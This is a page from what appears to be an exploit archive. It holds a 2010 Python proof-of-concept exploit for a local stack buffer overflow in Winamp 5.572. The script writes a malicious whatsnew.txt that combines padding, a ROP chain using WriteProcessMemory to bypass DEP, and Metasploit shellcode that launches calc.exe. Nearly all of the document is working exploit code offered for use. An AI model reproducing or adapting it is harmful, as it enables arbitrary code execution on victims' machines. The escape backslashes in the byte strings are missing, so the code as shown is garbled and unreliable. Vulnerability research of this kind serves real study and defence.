Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass)
# Published : 2010-06-17
# Author : TecR0c
# Previous Title : BlazeDVD v5.1 (.plf) Stack Buffer Overflow PoC Exploit - ALSR/DEP Bypass on Win7
# Next Title : Batch Audio Converter Lite Edition <= v1.0.0.0 Stack Buffer Overflow (SEH)
#!/usr/bin/python
#
# Title:                Winamp v5.572 local BOF exploit (EIP & SEH DEP Bypass)
# Author:               Rocco Calvi aka TecR0c - http://tecninja.net/blog | http://twitter.com/TecR0c
# Found BY:             Debug
# Date:                 June 18th, 2010
# Platform:             Windows XP sp3 En
# Greetz to:            Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

# Special thanks to mr_me for making me try harder and lincoln


# Usage stage 1 : Replace existing whatsnew.txt file with evil whatsnew.txt 

# Usage stage 2 : Launch Application > Help > About Winamp > Version History > BOOM!

 
print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                                       http://www.corelan.be:8800 |"
print "|                                              security@corelan.be |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] Winamp 5.572 (whatnews.txt) DEP Bypass - by TecR0c"



# http://www.metasploit.com
# EXITFUNC=process, CMD=calc.exe
sc = ("x89xe1xd9xeexd9x71xf4x58x50x59x49x49x49x49"
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a"
"x48x47x34x43x30x45x50x45x50x4cx4bx51x55x47"
"x4cx4cx4bx43x4cx45x55x42x58x45x51x4ax4fx4c"
"x4bx50x4fx45x48x4cx4bx51x4fx51x30x43x31x4a"
"x4bx51x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46"
"x51x49x50x4cx59x4ex4cx4dx54x49x50x42x54x45"
"x57x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4c"
"x34x47x4bx50x54x47x54x45x54x43x45x4bx55x4c"
"x4bx51x4fx47x54x45x51x4ax4bx45x36x4cx4bx44"
"x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c"
"x4bx45x4cx4cx4bx45x51x4ax4bx4cx49x51x4cx46"
"x44x44x44x48x43x51x4fx50x31x4ax56x45x30x50"
"x56x42x44x4cx4bx51x56x50x30x4cx4bx51x50x44"
"x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45"
"x58x4bx39x4ax58x4dx53x49x50x42x4ax50x50x43"
"x58x4ax50x4dx5ax44x44x51x4fx45x38x4ax38x4b"
"x4ex4cx4ax44x4ex50x57x4bx4fx4dx37x42x43x43"
"x51x42x4cx42x43x43x30x41x41");


version = "Winamp 5.572"

rop = "x41" * 540          # Crash


rop += "x09x12x0ex07"   # 0x070E1209 :  {POP}  # POP EDI # POP ESI # POP EBP
                            # XOR EAX,EAX # POP EBX # RETN               	[Module : nde.dll] 


rop += "xeexffxffxc0"   # 0xc0ffffee :  Junk
rop += "xeexffxffxc0"   # 0xc0ffffee :  Junk
rop += "xeexffxffxc0"   # 0xc0ffffee :  Junk
rop += "xeexffxffxc0"   # 0xc0ffffee :  Junk


rop += "x03x85x09x07"   # 0x07098503 :  EAX CALL   
rop += "xeexffxffxc0"   # 0xc0ffffee :  Junk
rop += "xeexffxffxc0"   # 0xc0ffffee :  Junk
rop += "xffxffxffxff"   # 0xffffffff :  for EBX


rop += "xc5x01x5ax78"   # 0x785A01C5 :  # POP EDX # RETN 	                [Module : MSVCR90.dll] 
rop += "x10xe0x10x07"   # 0x07100e01 :  Writeable Address


rop += "x46x17x5ax78"   # 0x785A1746 :  # ADD EAX,40 # POP EBP # RETN 	[Module : MSVCR90.dll]
rop += "xeexffxffxc0"   # 0xc0ffffee :  Junk
rop += "x6ex22x97x7c"   # 0x7C97226E :  # ADD EAX,100 # POP EBP # RETN
rop += "xcfx22x80x7c"   # 0x7C8022CF :  dest address in WriteProcessMemory()


rop += "xcfxc9x0ex07"   # 0x070EC9CF :  # ADD EBX,EAX # XOR AL,AL # RETN 	[Module : nde.dll]
rop += "x5ex89x09x07"   # 0x0709895E :  {POP}  # POP EAX # POP ESI # RETN 	[Module : libsndfile.dll] 
rop += "x13x22x80x7c"   # 0x7C802213 :  WriteProcessMemory 
rop += "xffxffxffxff"   # 0xffffffff :  HProcess HANDLE (-1)


rop += "x65x08x59x78"   # 0x78590865 :  # PUSHAD # RETN 	                [Module : MSVCR90.dll] 


junk = "x43" * 800


tecfile = open('whatsnew.txt','w')
tecfile.write(version + rop + sc + junk)
tecfile.close()